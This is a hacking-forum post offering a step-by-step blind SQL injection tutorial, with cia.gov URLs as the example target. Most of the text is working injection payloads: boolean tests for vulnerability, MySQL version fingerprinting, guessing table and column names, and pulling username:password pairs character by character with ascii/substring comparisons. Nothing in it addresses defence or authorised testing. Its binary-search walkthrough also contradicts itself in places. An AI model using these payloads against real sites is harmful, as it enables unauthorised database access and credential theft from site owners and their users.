{TUT}Blind SQL Injection{TUT}

Starting I will give the credits for this tutorial to SqlDoctor:

Blind SQL injection:

If you dont know about mysql injection turn around and learn it be for you even consider learning this because this is a whole different story.

1. test for vulnerability so you have a site lets say :
Code:
http://www.cia.gov/news.php?id=1
just like normal mysql injection.

But for blind injection you put:
Code:
http://www.cia.gov/news.php?id=1 and 1=2
If you see any text from the page missing or an error message like invalid id or db_error select * from xxxx@localhost call line "/" or anything like that then its vuln.

This works because 1=2 is always false you see if it was:
Code:
http://www.cia.gov/index.php?id=1 and 1=1
Then you would get the normal page because 1=1 is always true.

2. mysql version to find mysql version you need to do this query:
Code:
http://www.cia.gov/index.php?id=1 and substring(@@version,1,1)=4

If the pages comes back true then the version is 4 if not then try:
Code:
http://www.cia.gov/index.php?id=1 and substring(@@version,1,1)=5
If it comes back true then its a version 5.

3. Fuzzing tables and columns to find the table name you need to guess it so...here is the query:
Code:
http://www.cia.gov/news.php?id=1 and (SELECT 1 from admin limit 0,1)=1
I have guessed the table admin if the page loads true then the table exists
eg. the table name is administrator and we try:
Code:
(SELECT 1 from users limit 0,1)=1
Then it will return with an error a.k.a. falsebut if we did:
Code:
(SELECT 1 from administrator limit 0,1)=1
Then it would not error a.k.a. true.

Now for the column so the table is administrator and we found that by fuzzing
now we need the column name we fuzz it by:
Code:
http://www.cia.gov/news.php?id=1 and (SELECT substring(concat(1,password),1,1) from administrator limit 0,1)=1
If the column password exists then it wont error you get my drift...

4. Extracting password with ascii so now we have the table/column we need to extract well as you know it wont just pop up on the screen we will need to use the ancii char:
Code:
http://www.cia.gov/news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from administrator where userid=2),1,1))>99
if this returns true then you need to go higher
Code:
news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>103
if this errors then its not greater than 103 and greater than/or 99
now try
Code:
news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>100
no error then its greater than 99 and not greater than 103 higher
Code:
news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>101
error,so its greater than 99 but not greater than 101 higher
Code:
news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>100
error so its greater than 99 but not greater than 100 making it 100 the first character of the password is 100 which if u put into an ascii converter you will see that it is the letter d now you need to find the next character
Code:
news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>60
notice how i did where userid=1),2,1))>60 instead of 1,1 so this will be doing the second character so keep extracting characters untill u get an error then you will have the hash / password.

SAY THANKS TO KEEP THIS THREAD ALIVE !
If this tutorial helped you in one way leave your feedback !Biggrin

This is my first thread here in hackforums since i am a new member here i hope it helped you !

Categories: